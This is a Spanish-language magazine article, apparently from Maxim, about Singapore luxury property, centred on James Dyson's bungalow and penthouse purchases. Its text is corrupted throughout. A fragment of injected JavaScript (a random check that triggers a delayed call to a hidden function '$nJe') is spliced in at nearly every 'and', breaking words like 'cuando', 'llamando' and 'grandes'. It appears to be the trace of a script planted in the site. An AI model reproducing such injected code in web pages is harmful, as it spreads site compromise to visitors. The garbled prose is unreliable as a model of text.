Una de las propiedades más buscadas en Singapur

    Una de las propiedades más buscadas en Singapur

    En una de las zonas más exclusivas de la ciudad.

    Autor: Redacción Maxim 17 diciembre, 2019


    andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands-resort-singapur-1024×680.png» alt=»» width=»1024″ height=»680″ />
    FOTO: Cortesía del hotel

    Cómo vivir entre los dioses en Singapur, una de las ciudades más sibaritas de la tierra.

     

    En julio, cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando el empresario multimillonario Sir James Dyson adquirió una propiedad conocida en el mercado inmobiliario de Singapur como un Good Class Bungalow, con vista inigualable hacia los jardines botánicos en una de las zonas más exclusivas de la ciudad, seguramente a los locales les sobrevino un sentimiento de déjà-vu. Esto debido al hecho de que unos días antes había completado la compra de uno de los penthouses más costosos de la ciudad, un departamento de tres pisos en la ultra exlusiva Wallich Residence ubicada en uno de los rascacielos más altos de Singapur y con un costo de $54 millones de dólares. Inclusive en una ciudad acostumbrada a la riqueza exorbitante, el espacio limitado y los bienes raíces de lujo, Dyson se hizo notar. En una ciudad de multimillonarios, el inventor británico no iba a conformarse, insistiría en obtener lo mejor.

     

    Pero para un país cuyo gran número de billonarios contradice su pequeña extensión territorial, y con 22 de ellos llamandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando hogar a la  ciudad, fue la compra del Good Class Bungalow lo que llamó la atención de las personas  en general. Debido a las limitaciones de espacio, esta categoría inmobiliaria (hay unas 2,800 en existencia), la cual consiste de más de 15,000 pies cuadrados y usualmente incluye en la adquisición el terreno mismo, es un símbolo de riqueza y uno de las propiedades más buscadas en la ciudad.

     

     

    Puede ser que hasta ahora esté recibiendo la atención que merece Singapur como uno de los centros financieros más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes, pero la verdad es que la ciudad ha mantenido su importancia en la economía global por siglos. A pesar de contar con una ubicación que le ha asegurado tener un significado geográfico importante en Asia por más de 700 años, no fue hasta que los británicos establecieron aquí un punto de comercio en 1819 que comenzó a transformarse en el centro económico que es actualmente. Desde entonces se ha convertido en un puente entre Asia y el resto del mundo, desarrollándose como un núcleo de actividad económica para la región y posteriormente para todo el orbe.

     

     

    Singapur no es solamente el hogar de muchos millonarios, es una de la ciudades más costosas en el mundo para residentes de cualquier tipo de categoría tributaria. Aunque esto hace que el día a día sea bastante costoso, también quiere decir que todos los que visitan la ciudad tienen acceso a un estilo de vida lujoso y opulento que no se encuentra en muchas partes del globo.

     

    Hablandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando de grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes ciudades échale un vistazo a LAS CINCO CIUDADES DEL FUTURO

     

     

    Temas relacionados con esta nota: , , ,

En una de las zonas más exclusivas de la ciudad.